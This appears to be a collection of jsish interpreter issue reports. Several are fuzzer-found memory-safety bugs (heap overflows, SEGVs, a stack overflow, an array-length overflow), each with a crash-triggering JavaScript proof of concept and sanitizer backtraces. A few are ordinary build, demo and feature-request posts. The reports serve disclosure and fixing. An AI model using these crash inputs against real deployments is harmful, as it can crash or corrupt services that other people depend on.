So, I was hoping to use this in conjunction with the V language (https://github.com/vlang/v) but had to learn quickly that just cl jsish.c /Fejsish.exe wouldn't work, because:

C:\Users\ingwi\work\jsish\src/jsi.h(42): fatal error C1083: Cannot open include file: "dirent.h": No such file or directory

dirent.h is, from what I know, a POSIX-only API and thus not available in Microsoft's libc. Do you see a possibility for a native build that does not use MinGW?

The idea to create an amalgam by just #include-ing all the main source files is pretty smart and this would be a great way to use jsish within V; however, the build would, right now, fail on Windows via MSVC due to the absence of dirent.h

Will this eventually be worked on?

Kind regards,
Ingwie

Illegal memory dereference

DongzhuoZhao added on 2020-05-11 03:19:36:
git version:
4603977

save follow testcase as .js format :

v0=/a/g;
var v1="a";
(v1).replace(v0,isFinite);

run:
./jsimin poc.js

Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)

Backtrace:

Program received signal SIGSEGV, Segmentation fault.
0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
656 maxArgs = repVal->d.obj->d.fobj->func->argnames->argCnt;
(rr) bt
#0 0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
#1 0x0000560387560285 in jsi_FunctionSubCall (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
tocall=0x56038824e560, discard=1) at ./src/jsiEval.c:857
#2 0x0000560387560767 in jsiEvalFunction (ps=0x56038824d780,
ip=0x560388250af0, discard=1) at ./src/jsiEval.c:918
#3 0x000056038756238b in jsi_evalcode_sub (ps=0x56038824d780,
opcodes=0x56038824e640, scope=0x560388214950,
currentScope=0x5603881fe3f0, _this=0x5603881fe3f0, vret=0x560388231c90)
at ./src/jsiEval.c:1308
#4 0x000056038756810c in jsi_evalcode (ps=0x56038824d780, func=0x0,
opcodes=0x56038824e640, scope=0x560388214950, fargs=0x5603881fe3f0,
_this=0x5603881fe3f0, vret=0x7ffe29bd64b0) at ./src/jsiEval.c:2156
#5 0x0000560387569c5d in jsi_evalStrFile (interp=0x5603881f2260,
path=0x56038824c2e0,
str=0x7ffe29bd6594 "var v0 = /((?!B))|(\S)/g;\nvar v1="a a";\n(v1).replace(v0,isFinite);\n\n", flags=73, level=0) at ./src/jsiEval.c:2470
#6 0x000056038756a005 in Jsi_EvalFile (interp=0x5603881f2260,
fname=0x56038824c2e0, flags=73) at ./src/jsiEval.c:2519
#7 0x00005603874e521c in Jsi_Main (opts=0x7ffe29bddc20)
at ./src/jsiInterp.c:922

Illegal memory dereference in isFiniteCmd

DongzhuoZhao added on 2020-05-11 03:55:46:
git version:
4603977

Save the following testcase in .js format:

var v1 = new Array((()=>"toString")(), []);
v1.find(isFinite);

run:
./jsimin poc.js

Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)

Backtrace:

Program received signal SIGSEGV, Segmentation fault.
0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
456 return (pv->vt == JSI_VT_NUMBER || (pv->vt == JSI_VT_OBJECT && pv->d.obj->ot == JSI_OT_NUMBER));
(gdb) bt
#0 0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
#1 0x00005555555cfd3e in isFiniteCmd (interp=0x555555865260,
args=0x5555558c74f0, _this=0x5555558c7530, ret=0x7fffffff59e8,
funcPtr=0x55555588b110) at ./src/jsiCmds.c:1094
#2 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:799
#3 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:823
#4 0x00005555555bc062 in jsi_ArrayFindSubCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0, op=1) at ./src/jsiArray.c:584
#5 0x00005555555bc5dc in jsi_ArrayFindCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0) at ./src/jsiArray.c:659
#6 0x0000555555616285 in jsi_FunctionSubCall (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
tocall=0x5555558c1340, discard=1) at ./src/jsiEval.c:857
#7 0x0000555555616767 in jsiEvalFunction (ps=0x5555558c09d0,
ip=0x5555558c25b0, discard=1) at ./src/jsiEval.c:918

heap overflow

Environment

operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc1

poc:

function fail(message) {
}
function assert(condition, message) {
    if (!condition)
        fail(message);
}
function assertEquals(expression, value, message) {
    if (expression != value) {
        expression = ('' + expression).replace(/[\r\n]+/g, ')aOD$,0ZA>`W[oxl~4zXIG');
        value = ('' + value).replace(/\r?\n/g, '^A-}nr4+Cnb-(+`2M,');
        var FDwc = Proxy;
        fail('' + value + '' + expression + ';W' + message);
    }
}
var d;
d = null;
var jWeN = assert(null, null);
var QJmz = JSON;
for (var i = 0; i < loops; i += 1) {
    d = new Date();
    d = new function (x) {
        return {
            toString: function () {
                return x.toString();
            }
        };
    }(d.valueOf());
    var sDPa = new Map([
        [null],
        [
            null,
            null,
            null,
            null
        ]
    ]);
    d = d.parentNode;
    assert(null, null);
    var pxeM = Proxy;
    var bsAF = assert(null, null);
}

vulnerability description

Below is the ASAN output. We can see that the code has a heap overflow in jsi_evalcode_sub at src/jsiEval.c:1325.

Stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
export CFLAGS='-fsanitize=address'
make
Test case 1
WebSocket({
  "a": 2.3023e-320
})
Test case 2
var JSEtest = times(function () {
    WebSocket({
        'red': (new Object(null % null))
    });
}) < times(log(null % null));
assert.sameValue(JSEtest.length, 2, 'newArr.length');
Execution steps & Output
$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0)
    #0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151
    #1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    ......					......					......
    ......					......					......
    #246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg
====ABORTING

Credits: Found by OWL337 team.

Heap-buffer-overflow src/jsiEval.c:1289 in jsiEvalCodeSub

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
export CFLAGS='-fsanitize=address'
make
Test case
var x = [assert(arrObj.hasOwnProperty("1"), 'arrObj.hasOwnProperty("1") !== true')];
var arr = x.concat();

if (arr[0] !== 0) {
  $ERROR('#1: var x = [0,1]; var arr = x.concat(); arr[0] === 0. Actual: ' + (arr[0]));
}

Execution steps & Output
$ ./jsish/jsish poc.js

=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x5606c5363cbc bp 0x7ffd726922f0 sp 0x7ffd726922e0
READ of size 8 at 0x6250000000f8 thread T0
    #0 0x5606c5363cbb in jsiEvalCodeSub src/jsiEval.c:1289
    #1 0x5606c536515e in jsi_evalcode src/jsiEval.c:2204
    #2 0x5606c5369274 in jsi_evalStrFile src/jsiEval.c:2665
    #3 0x5606c505866a in Jsi_Main src/jsiInterp.c:936
    #4 0x5606c585d03a in jsi_main src/main.c:47
    #5 0x7efcba589bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x5606c4fec969 in _start (/usr/local/bin/jsish+0xe8969)

0x6250000000f8 is located 8 bytes to the left of 8192-byte region [0x625000000100,0x625000002100)
allocated by thread T0 here:
    #0 0x7efcbb1f8f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x5606c505d972 in Jsi_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1289 in jsiEvalCodeSub
========ABORTING

Credits: Found by OWL337 team.

Feature Request: "self documenting code" based on JSDoc Support

One of the issues I have using modules and libraries with jsish is that the documentation and help system, while broad, is not deep. It is also not clear how to extend the help to cover my own code. Often I have to read source in this jsish repo to get an idea of what is available and how to use it.

The self documenting concept/idea is to integrate a tool like jsdoc2md as part of the integrated help system. The self documenting use case would extend jsish help to scan the available jsi source (in local, vfs etc.) to build a reference manual based on available code. A jsdoc capability could also be used to dynamically document jsdoc supported external components like Vue.js. If not dynamically, then including a static jsdoc to markdown step in the build step can be used to generate the Vue.js documentation for \lib\www\md from unminified js source. JSDoc is based on /** ... */ C style comments, so it could also generate API docs from the C source.

In principle jsdoc information could also be used to improve/extend es5lint. That is, to compare jsdoc api documentation with api implementation, something like the es5lint-plugin-jsdoc.

SEGV at Jsi_TreeObjGetValue src/jsiObj.c:11

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1024-000093.txt

Description

Below is the ASAN output.

ASAN:SIGSEGV

==86028==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000575f24 bp 0x62e000000400 sp 0x7ffe49e19ee0 T0)
#0 0x575f23 in Jsi_TreeObjGetValue src/jsiObj.c:11
#1 0x457481 in Jsi_ValueKeyPresent src/jsiValue.c:1133
#2 0x73c00c in jsiEvalCodeSub src/jsiEval.c:1632
#3 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#4 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#5 0x44bc0a in jsi_FunctionInvoke src/jsiFunc.c:771
#6 0x44bc0a in Jsi_FunctionInvoke src/jsiFunc.c:783
#7 0x4f7093 in jsi_ArrayReduceSubCmd src/jsiArray.c:641
#8 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#9 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#10 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#11 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#12 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#13 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#14 0x499c46 in Jsi_Main src/jsiInterp.c:917
#15 0xc0345a in jsi_main src/main.c:44
#16 0x7f6b078bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#17 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiObj.c:11 Jsi_TreeObjGetValue
==86028==ABORTING

Ledger demo: windows path problems

I just discovered Jsish and am in the process of understanding the landscape.

Following https://docs.jsish.org/Demos.md I get:

D:\> jsish -a jsi-app.fossil Ledger
mopts { file:"jsi-app.fossil", noPatches:false, type:"fossil", version:"" }
CALL BACKTRACE:
#1: Archive.jsi:108:  in moduleRun( "jsi-app.fossil", "Ledger" )
#2: Archive.jsi:105:  in Archive( [ "jsi-app.fossil", "Ledger" ], {} )
#3: Archive.jsi:16:  in moduleRun()
#4: Ledger.jsi:1696:  in Ledger( [], {} )
#5: Ledger.jsi:1597:  in main()
#6: Ledger.jsi:133:  in createDb( 0, "C:/Users/mhwilkie/LedgerJsi/ledgerjs.db" )

Ledger.jsi:133: error: db open failed: C:\Users\mhwilkie\code/C:/Users/mhwilkie/LedgerJsi/ledgerjs.db    (c-extn [Sqlite])
ERROR:

It looks like a problem merging the current directory with HOMEDRIVE and HOMEPATH.

heap-buffer-overflow at Jsi_DSAppendLen src/jsiDString.c:109

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1021-000022.txt

Description

Below is the ASAN output.

=================================================================
==139092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a694 at pc 0x7f881c593935 bp 0x7ffeee682e00 sp 0x7ffeee6825a8
READ of size 5 at 0x60200000a694 thread T0
#0 0x7f881c593934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5c18de in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5c18de in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5ecbb3 in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4e2180 in StringSubstrCmd src/jsiString.c:145
#5 0x4c4f20 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x73e470 in jsiFunctionSubCall src/jsiEval.c:793
#7 0x73e470 in jsiEvalFunction src/jsiEval.c:828
#8 0x73e470 in jsiEvalCodeSub src/jsiEval.c:1253
#9 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#10 0x4c5eed in jsi_FuncCallSub src/jsiProto.c:220
#11 0x73e07c in jsiFunctionSubCall src/jsiEval.c:793
#12 0x73e07c in jsiEvalFunction src/jsiEval.c:828
#13 0x73e07c in jsiEvalCodeSub src/jsiEval.c:1253
#14 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#15 0x7534fb in jsi_evalStrFile src/jsiEval.c:2494
#16 0x49ae7e in Jsi_Main src/jsiInterp.c:917
#17 0xc07b32 in jsi_main src/main.c:44
#18 0x7f881ba3383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#19 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)

0x60200000a694 is located 0 bytes to the right of 4-byte region [0x60200000a690,0x60200000a694)
allocated by thread T0 here:
#0 0x7f881c59f602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49f4b2 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
==139092==ABORTING

MIR JIT

Hi Peter,

I just wanted to pass on some information. There is a new lightweight JIT called MIR - Medium Internal Representation. It is only 16,000 lines of code and claims close to native C performance in some scenarios.

An overview of the project is here: https://developers.redhat.com/blog/2020/01/20/mir-a-lightweight-jit-compiler-project/

MIR has been used to create a new "dialect" of Lua called Ravi. Ravi is a JIT-ed language that has optional static typing (sound familiar?). I haven't tried Ravi yet but it's on my todo list.

MIR looks like a very good technology and is written by a Senior GCC contributor. I thought I would pass on that tidbit. Feel free to close after you've read this. Cheers!

can't start demo application Ledger

I've tried to follow instructions in the documentation for running sample application Ledger.

$ jsish -v
3.4.9 3.0409 c3469e6dd397c8009dd867fcb2dc9e9c1696189c 2020-12-20 18:58:29 UTC
$ jsish -a jsi-app.fossil Ledger
mopts { file:"/home/vitalije/.FOSSILS/jsi-app.fossil", noPatches:false, type:"fossil", version:"ver-1.0302" }
Fossil mount: ver-1.0302 /vfs1 /home/vitalije/.FOSSILS/jsi-app.fossil
not a valid check-in: 2.13
CALL BACKTRACE:
#1: Archive.jsi:108:  in moduleRun( "-version", "ver-1.0302", "/home/vitalije/.FOSSILS/jsi-app.fossil", "Ledger" )
#2: Archive.jsi:105:  in Archive( [ "/home/vitalije/.FOSSILS/jsi-app.fossil", "Ledger" ], { version:"ver-1.0302" ...)
#3: Archive.jsi:39:  in main()
#4: Jsi_Vfs.jsi:186:  in Fossil( "list", "/vfs1", null )
#5: Jsi_Vfs.jsi:154:  in Fossil_List()

/zvfs/lib/Jsi_Vfs.jsi:154: error: program exit code (1)
ERROR: 

I've also tried to download the source code and build jsish, but even with a freshly built jsish I have the same error.
I am using Ubuntu 20.04.

integer overflow and buffer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1

poc:

var o = [
    1,
    2
];
o.length = ~-4294967297;
var Shek = o.concat(o, o, o);
var ytbj = JSON.stringify('TrT{IlX88;Pc&6KbA$5dJn');
o = o.concat(o, o, o);
var Pcmm = o.reduce(function () {
}, o.length);
var Xtjk = o.concat(o, o, o);
Xtjk = o.concat(o, o, o);
Shek = Shek.forEach(function () {
}, o.length);
var HxDr = 759250124 == o.length;
var mscw = JSON.stringify('+ÌDDú\x05jr\xB3\x0F\x13R\x0FB7\xA9\xA3G\xA0\x16');
var KGeW = new WeakSet([
    [3.1589793],
    []
]);
var KhcQ = new Map([
    [],
    [
        o.length,
        o.length,
        -2147483648
    ]
]);
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
var rbQB = o.forEach(function () {
}, o);
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;

vulnerability description:

The vulnerable code is at src/jsiValue.c line 261, in the function jsi_ValueCopyMove; the affected code is as follows:
The address pointed to by from is invalid, that is, an illegal memory access.

reason

In the process of parsing js, when encountering the concat function of js, jsish will call the parsing function jsi_ArrayConcatCmd

The curlen here is obtained by Jsi_ObjGetLength, as shown in the figure:

But curlen can be changed at will, and the for loop at src/jsiArray.c line 323 does not verify it, so it is easy to cross the boundary. In addition, the for loop calls the Jsi_ValueDup2 function, so content beyond the boundary gets copied.
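
As an added illustration of the root cause this report describes (not jsish's code: the ModelArray type, the MODEL_MAX_LEN cap and the helper names are constructed for the example), the concat below checks the requested total before allocating anything and clamps every copy to the slots that actually exist, so a script-set length can neither overflow the size arithmetic nor drive a read past the backing store:

```c
/* Constructed model of the array-length bug class described in the issue
 * above. Names, struct layout and the size cap are hypothetical and are not
 * jsish's own code. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MODEL_MAX_LEN ((size_t)1 << 31)   /* largest array the model will build */

typedef struct {
    double *items;   /* backing store with exactly 'alloc' slots */
    size_t  alloc;   /* slots actually allocated */
    size_t  length;  /* script-visible length; a script may set it freely */
} ModelArray;

ModelArray *model_new(const double *vals, size_t n) {
    ModelArray *a = calloc(1, sizeof *a);
    if (!a || !(a->items = calloc(n ? n : 1, sizeof *a->items))) { free(a); return NULL; }
    memcpy(a->items, vals, n * sizeof *vals);
    a->alloc = a->length = n;
    return a;
}

void model_free(ModelArray *a) { if (a) { free(a->items); free(a); } }

/* Equivalent of the script's "o.length = ~-4294967297": only the visible
 * length changes, the backing store does not grow. */
void model_set_length(ModelArray *a, size_t len) { a->length = len; }

/* Hardened concat. The reported loop trusted 'length' and so read past the
 * buffer once a script had set it beyond 'alloc'. Here the total is overflow-
 * and cap-checked before any allocation, each copy is clamped to the slots
 * that really exist, and the rest of the declared length is left as holes
 * (0.0 in this model). Returns NULL when the result is refused, so the caller
 * can raise a script error instead of crashing. */
ModelArray *model_concat(const ModelArray *const *srcs, size_t nsrc) {
    size_t total = 0;
    for (size_t k = 0; k < nsrc; k++) {
        size_t n = srcs[k]->length;
        if (n > MODEL_MAX_LEN || total > MODEL_MAX_LEN - n)
            return NULL;                          /* overflow or over the cap */
        total += n;
    }
    ModelArray *out = calloc(1, sizeof *out);
    if (!out) return NULL;
    out->items = calloc(total ? total : 1, sizeof *out->items);
    if (!out->items) { free(out); return NULL; }
    out->alloc = out->length = total;
    for (size_t k = 0, pos = 0; k < nsrc; pos += srcs[k]->length, k++) {
        const ModelArray *s = srcs[k];
        size_t have = s->length < s->alloc ? s->length : s->alloc;   /* clamp */
        memcpy(out->items + pos, s->items, have * sizeof *s->items);
    }
    return out;
}

/* Three scenarios from the report: a normal concat, the oversized length that
 * must be refused, and a length slightly past the allocation (holes). */
int model_selfcheck(void) {
    double v[2] = { 1.0, 2.0 };
    ModelArray *o = model_new(v, 2), *r;
    const ModelArray *four[4] = { o, o, o, o };
    r = model_concat(four, 4);
    int ok = r && r->length == 8 && r->items[7] == 2.0;
    model_free(r);
    model_set_length(o, (size_t)4294967296ULL);          /* ~-4294967297 */
    ok = ok && model_concat(four, 4) == NULL;             /* refused, no crash */
    model_set_length(o, 3);                               /* one hole per copy */
    r = model_concat(four, 4);
    ok = ok && r && r->length == 12 && r->items[2] == 0.0 && r->items[3] == 1.0;
    model_free(r); model_free(o);
    return ok;
}
```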

heap-buffer-overflow at Jsi_DSAppendLen src/jsiDString.c:109

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: c95c897
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

Target device:
Desktop Linux

POC

jsish-1021-000086.txt

Description

Below is the ASAN output.

=================================================================
==124748==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000c594 at pc 0x7fc9b3851935 bp 0x7ffe05c465a0 sp 0x7ffe05c45d48
READ of size 4 at 0x60200000c594 thread T0
#0 0x7fc9b3851934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5a2f41 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5a2f41 in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5cd571 in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4c517d in StringSubstringCmd src/jsiString.c:193
#5 0x4a82f8 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x72059a in jsiFunctionSubCall src/jsiEval.c:790
#7 0x72059a in jsiEvalFunction src/jsiEval.c:825
#8 0x72059a in jsiEvalCodeSub src/jsiEval.c:1250
#9 0x73335f in jsi_evalcode src/jsiEval.c:2190
#10 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#11 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#12 0x720371 in jsiEvalFunction src/jsiEval.c:825
#13 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#14 0x73335f in jsi_evalcode src/jsiEval.c:2190
#15 0x736037 in jsi_evalStrFile src/jsiEval.c:2496
#16 0x47e0ee in Jsi_Main src/jsiInterp.c:917
#17 0x90be3e in jsi_main src/main.c:44
#18 0x7fc9b2cf183f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#19 0x418238 in _start (/home/keven/Fuzzing/jsish-1023/jsish+0x418238)

0x60200000c594 is located 0 bytes to the right of 4-byte region [0x60200000c590,0x60200000c594)
allocated by thread T0 here:
#0 0x7fc9b385d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4825c2 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
==124748==ABORTING
